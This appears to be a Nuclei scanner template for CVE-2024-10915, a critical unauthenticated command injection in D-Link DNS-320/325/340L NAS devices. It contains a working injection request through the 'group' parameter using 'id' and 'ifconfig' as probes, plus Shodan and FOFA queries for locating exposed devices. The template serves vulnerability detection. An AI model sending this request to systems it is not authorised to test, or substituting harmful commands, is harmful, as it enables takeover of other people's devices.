id: CVE-2024-10915

info:
  name: D-Link NAS - Command Injection via Group Parameter
  author: s4e-io
  severity: critical
  description: |
    A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been rated as critical. Affected by this issue is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument group leads to os command injection.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands via the group parameter, potentially compromising the entire D-Link NAS device.
  remediation: |
    Update D-Link DNS-320, DNS-320LW, DNS-325, and DNS-340L firmware to versions released after 20241028.
  reference:
    - https://www.usom.gov.tr/bildirim/tr-24-1836
    - https://netsecfish.notion.site/Command-Injection-Vulnerability-in-group-parameter-for-D-Link-NAS-12d6b683e67c803fa1a0c0d236c9a4c5?pvs=4
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10915
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10915
    cwe-id: CWE-78,CWE-707
    epss-score: 0.94059
    epss-percentile: 0.99907
    cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: dlink
    product: dns-320_firmware
    shodan-query: http.html:"sharecenter"
    fofa-query: body="sharecenter"
  tags: cve,cve2024,dlink,sharecenter,rce,vuln,vkev

http:
  - raw:
      - |
        GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;{{command}};%27 HTTP/1.1
        Host: {{Hostname}}

    payloads:
      command:
        - "id"
        - "ifconfig"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)"
          - "contains_all(body, 'inet addr:', 'Mask:')"
        condition: or

      - type: dsl
        dsl:
          - 'contains(body, "Content-type: text/html")'
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100f6e4acce262a60bb7abcaf2ff36150fac384066bb448af150a0c72f88f5b5a33022100957e508dd84c0f946191e32285ea8cb69c386a2fa541ac5c8f0c787198b250bd:922c64590222798bb761d5b6d8e72950